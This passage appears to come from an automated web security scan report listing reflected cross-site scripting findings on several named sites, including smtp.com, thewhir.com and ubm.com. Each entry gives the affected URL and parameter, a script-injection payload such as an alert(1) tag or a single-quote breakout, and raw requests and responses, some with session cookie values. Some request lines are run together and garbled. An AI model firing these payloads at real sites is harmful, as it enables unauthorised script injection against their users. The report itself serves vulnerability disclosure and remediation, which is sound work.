2.147. http://www.powermta.port25.com/wp-content/themes/powermta1/style.css [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/wp-content/themes/powermta1/style.css
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b733"><script>alert(1)</script>1511c1ac9a1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2b733\"><script>alert(1)</script>1511c1ac9a1 in the application's response.
Request
GET /wp-content/themes/powermta1/style.css?2b733"><script>alert(1)</script>1511c1ac9a1 =1 HTTP/1.1;q=0.7.port25.com/wp-content/themes/powermta1/images/favicon.icof2d81%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E9be443f7c69
Response
HTTP/1.1 404 Not Found.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... .port25.com/wp-content/themes/powermta1/style.css?2b733\"><script>alert(1)</script>1511c1ac9a1 =1" />...[SNIP]...
2.148. http://www.smtp.com/ [gclid parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.smtp.com
Path:
/
Issue detail
The value of the gclid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d7cf"><script>alert(1)</script>19af489f11d was submitted in the gclid parameter. This input was echoed unmodified in the application's response.
Request
GET /?gclid=CJWNm_2JoqsCFSg1gwodCS0_kQ3d7cf"><script>alert(1)</script>19af489f11d HTTP/1.1/search?sourceid=chrome&ie=UTF-8&q=smtp+server/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3
Response
HTTP/1.1 200 OKefaa92e9d5b5d"=BAh7BzoRaHR0cF9yZWZlcmVyIkhodHRwOi8vd3d3Lmdvb2dsZS5jb20vc2VhcmNoP3NvdXJjZWlkPWNocm9tZSZpZT1VVEYtOCZxPXNtdHArc2VydmVyOg9zZXNzaW9uX2lkIiU4MjMyOWNjODZhNDNhYzBhOTM0NTM0NDczOGRiZjVlNQ%3D%3D--d77601bf4eb2e4d6e70d9401d391108ccdbc2dbd; path=/; HttpOnly/xhtml1/DTD/xhtml1-strict.dtd">/1999/xhtml" xml:lang="en">...[SNIP]... _2JoqsCFSg1gwodCS0_kQ3d7cf"><script>alert(1)</script>19af489f11d ">...[SNIP]...
2.149. http://www.smtp.com/ [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.smtp.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a671"><script>alert(1)</script>d486a6c61a9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
Request
GET /?gclid=CJWNm_2JoqsCFSg1gwodCS0_kQ&4a671"><script>alert(1)</script>d486a6c61a9 =1 HTTP/1.1/search?sourceid=chrome&ie=UTF-8&q=smtp+server/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3
Response
HTTP/1.1 200 OK3d63f269363a9"=BAh7BzoRaHR0cF9yZWZlcmVyIkhodHRwOi8vd3d3Lmdvb2dsZS5jb20vc2VhcmNoP3NvdXJjZWlkPWNocm9tZSZpZT1VVEYtOCZxPXNtdHArc2VydmVyOg9zZXNzaW9uX2lkIiU4MjMyOWNjODZhNDNhYzBhOTM0NTM0NDczOGRiZjVlNQ%3D%3D--d77601bf4eb2e4d6e70d9401d391108ccdbc2dbd; path=/; HttpOnly/xhtml1/DTD/xhtml1-strict.dtd">/1999/xhtml" xml:lang="en">...[SNIP]... _2JoqsCFSg1gwodCS0_kQ&4a671"><script>alert(1)</script>d486a6c61a9 =1">...[SNIP]...
2.150. http://www.smtp.com/favicon.ico [REST URL parameter 1]
previous
next
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.smtp.com
Path:
/favicon.ico
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f5d2"><a>09058fec952 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
Request
GET /favicon.ico9f5d2"><a>09058fec952 HTTP/1.1;q=0.3.673105426.1316204863.1316204863.1316204863.1; __utmb=173546785.1.10.1316204863; __utmc=173546785; __utmz=173546785.1316204863.1.1.utmgclid=CJWNm_2JoqsCFSg1gwodCS0_kQ|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=smtp%20server; _global_session=BAh7BzoRaHR0cF9yZWZlcmVyIkhodHRwOi8vd3d3Lmdvb2dsZS5jb20vc2VhcmNoP3NvdXJjZWlkPWNocm9tZSZpZT1VVEYtOCZxPXNtdHArc2VydmVyOg9zZXNzaW9uX2lkIiU4MjMyOWNjODZhNDNhYzBhOTM0NTM0NDczOGRiZjVlNQ%3D%3D--d77601bf4eb2e4d6e70d9401d391108ccdbc2dbd
Response
HTTP/1.1 404 Not Found=BAh7BzoRaHR0cF9yZWZlcmVyIkhodHRwOi8vd3d3Lmdvb2dsZS5jb20vc2VhcmNoP3NvdXJjZWlkPWNocm9tZSZpZT1VVEYtOCZxPXNtdHArc2VydmVyOg9zZXNzaW9uX2lkIiU4MjMyOWNjODZhNDNhYzBhOTM0NTM0NDczOGRiZjVlNQ%3D%3D--d77601bf4eb2e4d6e70d9401d391108ccdbc2dbd; path=/; HttpOnly/xhtml1/DTD/xhtml1-strict.dtd">/1999/xhtml" xml:lang="en">...[SNIP]... 9f5d2"><a>09058fec952 ">...[SNIP]...
2.151. http://www.smtp.com/jackpot_config [REST URL parameter 1]
previous
next
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.smtp.com
Path:
/jackpot_config
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6feb5"><a>b032290a8ca was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
Request
GET /jackpot_config6feb5"><a>b032290a8ca ?default=1000000 HTTP/1.1/smtpcom-jackpot-vert.swf?;q=0.3=BAh7BzoRaHR0cF9yZWZlcmVyIkhodHRwOi8vd3d3Lmdvb2dsZS5jb20vc2VhcmNoP3NvdXJjZWlkPWNocm9tZSZpZT1VVEYtOCZxPXNtdHArc2VydmVyOg9zZXNzaW9uX2lkIiU4MjMyOWNjODZhNDNhYzBhOTM0NTM0NDczOGRiZjVlNQ%3D%3D--d77601bf4eb2e4d6e70d9401d391108ccdbc2dbd; __utma=173546785.673105426.1316204863.1316204863.1316204863.1; __utmb=173546785.1.10.1316204863; __utmc=173546785; __utmz=173546785.1316204863.1.1.utmgclid=CJWNm_2JoqsCFSg1gwodCS0_kQ|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=smtp%20server
Response
HTTP/1.1 404 Not Found=BAh7BzoRaHR0cF9yZWZlcmVyIjJodHRwOi8vd3d3LnNtdHAuY29tL3NtdHBjb20tamFja3BvdC12ZXJ0LnN3Zj86D3Nlc3Npb25faWQiJWUzZDYxYWRmOWJiMWQ4NTVjOWNjMzg1Y2ZhM2U3ODIw--fd32e95ec38334558e2f87ef3f923d0b313e0652; path=/; HttpOnly/xhtml1/DTD/xhtml1-strict.dtd">/1999/xhtml" xml:lang="en">...[SNIP]... 6feb5"><a>b032290a8ca ?default=1000000">...[SNIP]...
2.152. http://www.smtp.com/service-info [REST URL parameter 1]
previous
next
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.smtp.com
Path:
/service-info
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 63dce"><a>8468ca3b1b7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
Request
GET /service-info63dce"><a>8468ca3b1b7 HTTP/1.1?gclid=CJWNm_2JoqsCFSg1gwodCS0_kQ/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3.673105426.1316204863.1316204863.1316204863.1; __utmb=173546785.1.10.1316204863; __utmc=173546785; __utmz=173546785.1316204863.1.1.utmgclid=CJWNm_2JoqsCFSg1gwodCS0_kQ|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=smtp%20server; _global_session=BAh7BzoRaHR0cF9yZWZlcmVyIkhodHRwOi8vd3d3Lmdvb2dsZS5jb20vc2VhcmNoP3NvdXJjZWlkPWNocm9tZSZpZT1VVEYtOCZxPXNtdHArc2VydmVyOg9zZXNzaW9uX2lkIiU4MjMyOWNjODZhNDNhYzBhOTM0NTM0NDczOGRiZjVlNQ%3D%3D--d77601bf4eb2e4d6e70d9401d391108ccdbc2dbd
Response
HTTP/1.1 404 Not Found=BAh7BzoRaHR0cF9yZWZlcmVyIjpodHRwOi8vd3d3LnNtdHAuY29tLz9nY2xpZD1DSldObV8ySm9xc0NGU2cxZ3dvZENTMF9rUToPc2Vzc2lvbl9pZCIlMjRmOGYyYzQ2ZGFlYjk0OTgzZWI4MTRjZWNkNTZiMGY%3D--e179e22a639ed9356f6574f29195c6f4a2fd9781; path=/; HttpOnly/xhtml1/DTD/xhtml1-strict.dtd">/1999/xhtml" xml:lang="en">...[SNIP]... 63dce"><a>8468ca3b1b7 ">...[SNIP]...
2.153. http://www.smtp.com/service-info [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.smtp.com
Path:
/service-info
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29ac3"><script>alert(1)</script>cb0b67d5058 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
Request
GET /service-info?29ac3"><script>alert(1)</script>cb0b67d5058 =1 HTTP/1.1?gclid=CJWNm_2JoqsCFSg1gwodCS0_kQ/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3.673105426.1316204863.1316204863.1316204863.1; __utmb=173546785.1.10.1316204863; __utmc=173546785; __utmz=173546785.1316204863.1.1.utmgclid=CJWNm_2JoqsCFSg1gwodCS0_kQ|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=smtp%20server; _global_session=BAh7BzoRaHR0cF9yZWZlcmVyIkhodHRwOi8vd3d3Lmdvb2dsZS5jb20vc2VhcmNoP3NvdXJjZWlkPWNocm9tZSZpZT1VVEYtOCZxPXNtdHArc2VydmVyOg9zZXNzaW9uX2lkIiU4MjMyOWNjODZhNDNhYzBhOTM0NTM0NDczOGRiZjVlNQ%3D%3D--d77601bf4eb2e4d6e70d9401d391108ccdbc2dbd
Response
HTTP/1.1 200 OK2ad4295043c2a"=BAh7BzoRaHR0cF9yZWZlcmVyIjpodHRwOi8vd3d3LnNtdHAuY29tLz9nY2xpZD1DSldObV8ySm9xc0NGU2cxZ3dvZENTMF9rUToPc2Vzc2lvbl9pZCIlMjRmOGYyYzQ2ZGFlYjk0OTgzZWI4MTRjZWNkNTZiMGY%3D--e179e22a639ed9356f6574f29195c6f4a2fd9781; path=/; HttpOnly/xhtml1/DTD/xhtml1-strict.dtd">/1999/xhtml" xml:lang="en">...[SNIP]... 29ac3"><script>alert(1)</script>cb0b67d5058 =1">...[SNIP]...
2.154. http://www.smtp.com/signup [REST URL parameter 1]
previous
next
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.smtp.com
Path:
/signup
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13d96"><a>ec47253389c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
Request
GET /13d96"><a>ec47253389c HTTP/1.1/service-info/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3=BAh7BzoRaHR0cF9yZWZlcmVyIkhodHRwOi8vd3d3Lmdvb2dsZS5jb20vc2VhcmNoP3NvdXJjZWlkPWNocm9tZSZpZT1VVEYtOCZxPXNtdHArc2VydmVyOg9zZXNzaW9uX2lkIiU4MjMyOWNjODZhNDNhYzBhOTM0NTM0NDczOGRiZjVlNQ%3D%3D--d77601bf4eb2e4d6e70d9401d391108ccdbc2dbd; __utma=173546785.673105426.1316204863.1316204863.1316204863.1; __utmb=173546785.2.10.1316204863; __utmc=173546785; __utmz=173546785.1316204863.1.1.utmgclid=CJWNm_2JoqsCFSg1gwodCS0_kQ|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=smtp%20server
Response
HTTP/1.1 404 Not Found=BAh7BzoRaHR0cF9yZWZlcmVyIjJodHRwOi8vd3d3LnNtdHAuY29tL3NtdHBjb20tamFja3BvdC12ZXJ0LnN3Zj86D3Nlc3Npb25faWQiJWUzZDYxYWRmOWJiMWQ4NTVjOWNjMzg1Y2ZhM2U3ODIw--fd32e95ec38334558e2f87ef3f923d0b313e0652; path=/; HttpOnly/xhtml1/DTD/xhtml1-strict.dtd">/1999/xhtml" xml:lang="en">...[SNIP]... 13d96"><a>ec47253389c ">...[SNIP]...
2.155. http://www.smtp.com/smtpcom-jackpot-vert.swf [REST URL parameter 1]
previous
next
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.smtp.com
Path:
/smtpcom-jackpot-vert.swf
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c02ff"><a>c8ca54df0d3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
Request
GET /smtpcom-jackpot-vert.swfc02ff"><a>c8ca54df0d3 ? HTTP/1.1?gclid=CJWNm_2JoqsCFSg1gwodCS0_kQ;q=0.3=BAh7BzoRaHR0cF9yZWZlcmVyIkhodHRwOi8vd3d3Lmdvb2dsZS5jb20vc2VhcmNoP3NvdXJjZWlkPWNocm9tZSZpZT1VVEYtOCZxPXNtdHArc2VydmVyOg9zZXNzaW9uX2lkIiU4MjMyOWNjODZhNDNhYzBhOTM0NTM0NDczOGRiZjVlNQ%3D%3D--d77601bf4eb2e4d6e70d9401d391108ccdbc2dbd
Response
HTTP/1.1 404 Not Found=BAh7BzoRaHR0cF9yZWZlcmVyIkhodHRwOi8vd3d3Lmdvb2dsZS5jb20vc2VhcmNoP3NvdXJjZWlkPWNocm9tZSZpZT1VVEYtOCZxPXNtdHArc2VydmVyOg9zZXNzaW9uX2lkIiU4MjMyOWNjODZhNDNhYzBhOTM0NTM0NDczOGRiZjVlNQ%3D%3D--d77601bf4eb2e4d6e70d9401d391108ccdbc2dbd; path=/; HttpOnly/xhtml1/DTD/xhtml1-strict.dtd">/1999/xhtml" xml:lang="en">...[SNIP]... -vert.swfc02ff"><a>c8ca54df0d3 ?">...[SNIP]...
2.156. https://www.smtp.com/favicon.ico [REST URL parameter 1]
previous
next
Summary
Severity:
High
Confidence:
Firm
Host:
https://www.smtp.com
Path:
/favicon.ico
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f904e"><a>5c6fa54ebb3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
Request
GET /favicon.icof904e"><a>5c6fa54ebb3 HTTP/1.1;q=0.3.673105426.1316204863.1316204863.1316204863.1; __utmb=173546785.2.10.1316204863; __utmc=173546785; __utmz=173546785.1316204863.1.1.utmgclid=CJWNm_2JoqsCFSg1gwodCS0_kQ|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=smtp%20server; _global_session=BAh7CDoRaHR0cF9yZWZlcmVyIkhodHRwOi8vd3d3Lmdvb2dsZS5jb20vc2VhcmNoP3NvdXJjZWlkPWNocm9tZSZpZT1VVEYtOCZxPXNtdHArc2VydmVyOg9zZXNzaW9uX2lkIiU4MjMyOWNjODZhNDNhYzBhOTM0NTM0NDczOGRiZjVlNToQX2NzcmZfdG9rZW4iMXFTV2pPZHJOUytnSmhmMFBLaFI0OFBqTUxqM3gvUXo5RlIzNGtMWUxKczQ9--2c03a874c155ebb1c45e43460df9f03c37c5c032
Response
HTTP/1.1 404 Not Found=BAh7CDoRaHR0cF9yZWZlcmVyIiVodHRwOi8vd3d3LnNtdHAuY29tL3NlcnZpY2UtaW5mbzoQX2NzcmZfdG9rZW4iMVA4bzBPNkU0cE5BckRzUGpLRzNCOWZGUEhNTkZTUFU2Yk02UHplUVhjbjQ9Og9zZXNzaW9uX2lkIiU1MGQ3NjM5NDgxODc5NjYzZGI4NDRhMmI0ZWUyODk4NQ%3D%3D--bb4ae4ec63b5f1ad8ca37a5b64812391cc4bdcb0; path=/; HttpOnly/xhtml1/DTD/xhtml1-strict.dtd">/1999/xhtml" xml:lang="en">...[SNIP]... f904e"><a>5c6fa54ebb3 ">...[SNIP]...
2.157. https://www.smtp.com/signup [REST URL parameter 1]
previous
next
Summary
Severity:
High
Confidence:
Firm
Host:
https://www.smtp.com
Path:
/signup
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c997"><a>a8c202834f3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
Request
GET /signup1c997"><a>a8c202834f3 HTTP/1.1/service-info/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3=BAh7BzoRaHR0cF9yZWZlcmVyIkhodHRwOi8vd3d3Lmdvb2dsZS5jb20vc2VhcmNoP3NvdXJjZWlkPWNocm9tZSZpZT1VVEYtOCZxPXNtdHArc2VydmVyOg9zZXNzaW9uX2lkIiU4MjMyOWNjODZhNDNhYzBhOTM0NTM0NDczOGRiZjVlNQ%3D%3D--d77601bf4eb2e4d6e70d9401d391108ccdbc2dbd; __utma=173546785.673105426.1316204863.1316204863.1316204863.1; __utmb=173546785.2.10.1316204863; __utmc=173546785; __utmz=173546785.1316204863.1.1.utmgclid=CJWNm_2JoqsCFSg1gwodCS0_kQ|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=smtp%20server
Response
HTTP/1.1 404 Not Found=BAh7CDoRaHR0cF9yZWZlcmVyIiVodHRwOi8vd3d3LnNtdHAuY29tL3NlcnZpY2UtaW5mbzoPc2Vzc2lvbl9pZCIlNTBkNzYzOTQ4MTg3OTY2M2RiODQ0YTJiNGVlMjg5ODU6EF9jc3JmX3Rva2VuIjFQOG8wTzZFNHBOQXJEc1BqS0czQjlmRlBITU5GU1BVNmJNNlB6ZVFYY240PQ%3D%3D--2a5966b9bb25ab1c16bb6c9bda97ccc9b62603df; path=/; HttpOnly/xhtml1/DTD/xhtml1-strict.dtd">/1999/xhtml" xml:lang="en">...[SNIP]... 1c997"><a>a8c202834f3 ">...[SNIP]...
2.158. https://www.smtp.com/signup [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
https://www.smtp.com
Path:
/signup
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c681a"><script>alert(1)</script>86fcc655326 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
Request
GET /signup?c681a"><script>alert(1)</script>86fcc655326 =1 HTTP/1.1/service-info/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3=BAh7BzoRaHR0cF9yZWZlcmVyIkhodHRwOi8vd3d3Lmdvb2dsZS5jb20vc2VhcmNoP3NvdXJjZWlkPWNocm9tZSZpZT1VVEYtOCZxPXNtdHArc2VydmVyOg9zZXNzaW9uX2lkIiU4MjMyOWNjODZhNDNhYzBhOTM0NTM0NDczOGRiZjVlNQ%3D%3D--d77601bf4eb2e4d6e70d9401d391108ccdbc2dbd; __utma=173546785.673105426.1316204863.1316204863.1316204863.1; __utmb=173546785.2.10.1316204863; __utmc=173546785; __utmz=173546785.1316204863.1.1.utmgclid=CJWNm_2JoqsCFSg1gwodCS0_kQ|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=smtp%20server
Response
HTTP/1.1 200 OK132dea727b9c4"=BAh7CDoRaHR0cF9yZWZlcmVyIiVodHRwOi8vd3d3LnNtdHAuY29tL3NlcnZpY2UtaW5mbzoQX2NzcmZfdG9rZW4iMVA4bzBPNkU0cE5BckRzUGpLRzNCOWZGUEhNTkZTUFU2Yk02UHplUVhjbjQ9Og9zZXNzaW9uX2lkIiU1MGQ3NjM5NDgxODc5NjYzZGI4NDRhMmI0ZWUyODk4NQ%3D%3D--bb4ae4ec63b5f1ad8ca37a5b64812391cc4bdcb0; path=/; HttpOnly/xhtml1/DTD/xhtml1-strict.dtd">/1999/xhtml" xml:lang="en">...[SNIP]... c681a"><script>alert(1)</script>86fcc655326 =1">...[SNIP]...
2.159. http://www.thewhir.com/favicon.ico [REST URL parameter 1]
previous
next
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.thewhir.com
Path:
/favicon.ico
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb74e"><a>07046d1348c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
Request
GET /favicon.icobb74e"><a>07046d1348c HTTP/1.1;q=0.3.973132951.1316214083.1316214083.1316214083.1; __utmb=130075850.1.10.1316214083; __utmc=130075850; __utmz=130075850.1316214083.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=godaddy%20hack; agf_s=google%7Corganic%7C%28organic%29%7Cgodaddy+hack%23sclient%7C; agf_v=51008903|1; agf_vtt=510089031316214083050|0
Response
HTTP/1.1 200 OK/xhtml1/DTD/xhtml1-strict.dtd">/1999/xhtml" xml:lang="en" xmlns:fb="http://www.facebook.co...[SNIP]... bb74e"><a>07046d1348c Section">...[SNIP]...
2.160. http://www.thewhir.com/web-hosting-news/091611_Go_Daddy_Helping_Customers_Repair_Compromised_Sites [REST URL parameter 1]
previous
next
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.thewhir.com
Path:
/web-hosting-news/091611_Go_Daddy_Helping_Customers_Repair_Compromised_Sites
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cfc5e"><a>cd08598e1ee was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
Request
GET /web-hosting-newscfc5e"><a>cd08598e1ee /091611_Go_Daddy_Helping_Customers_Repair_Compromised_Sites HTTP/1.1/search?sourceid=chrome&ie=UTF-8&q=godaddy+hack#sclient=psy-ab&hl=en&tbo=1&tbs=qdr:w&source=hp&q=godaddy%20malware%20attack&pbx=1&oq=&aq=&aqi=&aql=&gs_sm=&gs_upl=&tbo=1&fp=1&biw=1407&bih=1005&pf=p&pdl=500&bav=on.2,or.r_gc.r_pw.&cad=b/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3
Response
HTTP/1.1 200 OK/xhtml1/DTD/xhtml1-strict.dtd">/1999/xhtml" xml:lang="en" xmlns:fb="http://www.facebook.co...[SNIP]... cfc5e"><a>cd08598e1ee Section">...[SNIP]...
2.161. http://www.thewhir.com/web-hosting-news/091611_Go_Daddy_Helping_Customers_Repair_Compromised_Sites [REST URL parameter 1]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.thewhir.com
Path:
/web-hosting-news/091611_Go_Daddy_Helping_Customers_Repair_Compromised_Sites
Issue detail
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5f995'-alert(1)-'2a20e35a8c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /web-hosting-news5f995'-alert(1)-'2a20e35a8c /091611_Go_Daddy_Helping_Customers_Repair_Compromised_Sites HTTP/1.1/search?sourceid=chrome&ie=UTF-8&q=godaddy+hack#sclient=psy-ab&hl=en&tbo=1&tbs=qdr:w&source=hp&q=godaddy%20malware%20attack&pbx=1&oq=&aq=&aqi=&aql=&gs_sm=&gs_upl=&tbo=1&fp=1&biw=1407&bih=1005&pf=p&pdl=500&bav=on.2,or.r_gc.r_pw.&cad=b/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3
Response
HTTP/1.1 200 OK/xhtml1/DTD/xhtml1-strict.dtd">/1999/xhtml" xml:lang="en" xmlns:fb="http://www.facebook.co...[SNIP]... eclick.net/adj/inet.whir/web-hosting-news5f995'-alert(1)-'2a20e35a8c ;pos=top;sz=728x90;tile='+inet_tile+';ord=' + inet_ord + '?">...[SNIP]...
2.162. http://www.ubm.com/en/people/ubm-people.aspx [body_0%24main_0%24ctl02%24ctl01%24ctl00 parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ubm.com
Path:
/en/people/ubm-people.aspx
Issue detail
The value of the body_0%24main_0%24ctl02%24ctl01%24ctl00 request parameter is copied into the HTML document as plain text between tags. The payload 5c5ad<script>alert(1)</script>fd240fc5180 was submitted in the body_0%24main_0%24ctl02%24ctl01%24ctl00 parameter. This input was echoed unmodified in the application's response.
Request
POST /en/people/ubm-people.aspx HTTP/1.1/people/ubm-people.aspx-urlencoded/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3{FE5D7FDF-89C0-4D99-9AA3-B5FBD009C9F3}; ASP.NET_SessionId=lrutmeuvvoi00fjnhwegnc3x; SERVERID=GS2-WEB01; __utma=101304133.2104120162.1316209479.1316209479.1316209479.1; __utmb=101304133.3.10.1316209479; __utmc=101304133; __utmz=101304133.1316209479.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); www-ubm-com#lang=enb7TY6KqTJRID%2BdVEbtvUTDRQXS1R6KhkhRZEWMKSb3Ci9hgSPZDR5Xk%2BLLWor%2BYn%2BME7CvjoDD%2FlEy1UMX2bmHN%2FspajQ78bSNzfePKR%2FD02KYGTunIKcADOvkizBlP%2FgjK5Q%2FSLDkl9ljsL%2FlthnEAZqYtON1Lh...[SNIP]... ug0XBdtqyCsrQpa1VQmFdhCld4wNjiXPRTMI%2BczkjdJQ7mQ5R9lrgveBXW3xYHiUG%2FWUxgs0hEdhpVSTO78hpq9NPsY1ZPnQU4hfVANjdEI%2B5LFptmwozs%3D&body_0%24main_0%24ctl02%24ctl01%24ctl00=help+contact5c5ad<script>alert(1)</script>fd240fc5180 &body_0%24main_0%24ctl02%24ctl02%24ctl00.x=0&body_0%24main_0%24ctl02%24ctl02%24ctl00.y=0&__VIEWSTATEENCRYPTED=&__EVENTVALIDATION=J7Qo6GFZ3zrslPXaYz4ux%2FNTIajbhqpvJeyFaPXiCDZ8dnRnphppF1G692B2Hm%2FIOSn...[SNIP]...
Response (redirected)
HTTP/1.1 200 OK-production#lang=en; path=/; HttpOnly-production#lang=en; path=/; HttpOnly-production#lang=en; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml" >...[SNIP]... eaderText">5c5ad<script>alert(1)</script>fd240fc5180 ...[SNIP]...
2.163. http://www.ubm.com/en/site-services/search/search-result.aspx [Domain parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ubm.com
Path:
/en/site-services/search/search-result.aspx
Issue detail
The value of the Domain request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a54a"><script>alert(1)</script>afa1cd40535 was submitted in the Domain parameter. This input was echoed unmodified in the application's response.
Request
GET /en/site-services/search/search-result.aspx?ResultPage=1&Domain=MergeAll7a54a"><script>alert(1)</script>afa1cd40535 &query=help%20contact HTTP/1.1/people/ubm-people.aspx/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3{FE5D7FDF-89C0-4D99-9AA3-B5FBD009C9F3}; ASP.NET_SessionId=lrutmeuvvoi00fjnhwegnc3x; SERVERID=GS2-WEB01; __utma=101304133.2104120162.1316209479.1316209479.1316209479.1; __utmb=101304133.3.10.1316209479; __utmc=101304133; __utmz=101304133.1316209479.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); www-ubm-com#lang=en
Response
HTTP/1.1 200 OK-production#lang=en; path=/; HttpOnly-production#lang=en; path=/; HttpOnly-production#lang=en; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml" >...[SNIP]... /search/search-result.aspx?ResultPage=1&Domain=MergeAll7a54a"><script>alert(1)</script>afa1cd40535 &query=help contact&page=2">...[SNIP]...
2.164. http://www.ubm.com/en/site-services/search/search-result.aspx [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ubm.com
Path:
/en/site-services/search/search-result.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af5e7"><script>alert(1)</script>b8d3e48110f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
Request
GET /en/site-services/search/search-result.aspx?ResultPage=1&Domain=MergeAll&query=help%20contact&af5e7"><script>alert(1)</script>b8d3e48110f =1 HTTP/1.1/people/ubm-people.aspx/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3{FE5D7FDF-89C0-4D99-9AA3-B5FBD009C9F3}; ASP.NET_SessionId=lrutmeuvvoi00fjnhwegnc3x; SERVERID=GS2-WEB01; __utma=101304133.2104120162.1316209479.1316209479.1316209479.1; __utmb=101304133.3.10.1316209479; __utmc=101304133; __utmz=101304133.1316209479.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); www-ubm-com#lang=en
Response
HTTP/1.1 200 OK-production#lang=en; path=/; HttpOnly-production#lang=en; path=/; HttpOnly-production#lang=en; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml" >...[SNIP]... /search/search-result.aspx?ResultPage=1&Domain=MergeAll&query=help contact&af5e7"><script>alert(1)</script>b8d3e48110f =1&page=2">...[SNIP]...
